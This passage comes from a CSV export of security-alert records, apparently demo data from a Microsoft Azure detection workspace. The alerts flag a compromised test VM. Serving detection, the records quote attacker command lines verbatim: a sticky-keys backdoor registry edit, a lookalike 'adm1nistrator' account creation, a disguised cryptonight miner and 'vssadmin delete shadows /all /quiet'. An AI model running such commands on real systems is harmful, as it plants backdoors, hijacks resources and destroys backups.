""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1630"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.4929053Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
123,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,b3737297-038c-4514-a957-d591384b4256,2518547714843796759_b3737297-038c-4514-a957-d591384b4256,Detection,Microsoft,Sticky keys attack detected,Sticky keys attack detected,Sticky keys attack detected,"Analysis of host data indicates that an attacker may be subverting an accessibility binary (for example sticky keys, onscreen keyboard, narrator) in order to provide backdoor access to the host MSTICALERTSWIN1. ",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg add image file execution options sethc.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1584"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1584"",
""CommandLine"": "".\\reg add image file execution options sethc.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.620324Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
124,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,4fa26308-1daf-49ee-8880-b194f950d8b0,2518547714833859291_4fa26308-1daf-49ee-8880-b194f950d8b0,Detection,Microsoft,Detected potentially suspicious use of Telegram tool,Detected potentially suspicious use of Telegram tool,Detected potentially suspicious use of Telegram tool,"Analysis of host data shows installation of Telegram, a free cloud-based instant messaging service that exists both for mobile and desktop system. Attackers are known to abuse this service to transfer malicious binaries to any other computer, phone, or tablet.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe c:\\users\\msticadmin\\appdata\\local\\temp\\2\\is-01dd7.tmp\\tsetup.1.0.14.tmp\"" /sl5=\""$250276,19992586,423424,c:\\users\\msticadmin\\downloads\\tsetup.1.0.14.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1064"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""tsetup.1.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1064"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\tsetup.1.exe c:\\users\\msticadmin\\appdata\\local\\temp\\2\\is-01dd7.tmp\\tsetup.1.0.14.tmp\"" /sl5=\""$250276,19992586,423424,c:\\users\\msticadmin\\downloads\\tsetup.1.0.14.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.6140708Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
125,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,d12ed618-567b-4b8f-8241-82ad4c1cb28e,2518547714813699414_d12ed618-567b-4b8f-8241-82ad4c1cb28e,Detection,Microsoft,High risk software detected,High risk software detected,High risk software detected,"Analysis of host data from MSTICALERTSWIN1 detected the usage of software that has been associated with the installation of malware in the past. A common technique utilized in the distribution of malicious software is to package it within otherwise benign tools such as the one seen in this alert. Upon using these tools, the malware can be silently installed in the background.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1414"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""bittorrent.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1414"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\bittorrent.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.6300585Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
126,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 05:38:06,2019-01-15 05:38:06,3a20bebd-556f-44e6-8a19-569d939458c9,fbaf48de-152a-4aa6-8a69-902b219bf972,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25592"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 25592
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25592
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 25592
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:48:11,,,
127,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-14 06:25:57,2019-01-15 06:25:57,fa83104f-178f-4141-9f1c-4f8757c0ca55,1828afac-b4c2-41d9-acbd-7d23b7219557,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-15T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""25047"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1703"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 25047
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 25047
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 9147
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 823
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 500
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 06:36:02,,,
128,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:00,2019-01-15 11:45:00,836318d1-0fa0-4cfe-a3d0-2b1fdbaf2216,2518547480991748435_836318d1-0fa0-4cfe-a3d0-2b1fdbaf2216,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""EndTimeUtc"": ""2019-01-15T11:45:00.8251564Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
129,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,54bb943e-7fe9-4146-a43e-4064c8e0049f,2518547480988516756_54bb943e-7fe9-4146-a43e-4064c8e0049f,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x3e4"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x107c"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticalertswin1$"",
""NTDomain"": ""workgroup"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
130,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,668ed54c-9e73-4d4f-a9c2-b88fd1b13db0,2518547480988516756_668ed54c-9e73-4d4f-a9c2-b88fd1b13db0,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x107c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x107c"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.1483243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
131,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,fa350f8b-2c81-478c-a383-debe0ab0c892,2518547480955968326_fa350f8b-2c81-478c-a383-debe0ab0c892,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1590"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=md0FA0lp6ylACLI8tXMVySYKT9S%2FHWJh8VkZ5YrTgSE%3D&spr=https&st=2019-01-14T15:22:59Z&se=2019-04-14T15:37:59Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1590"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.4031673Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
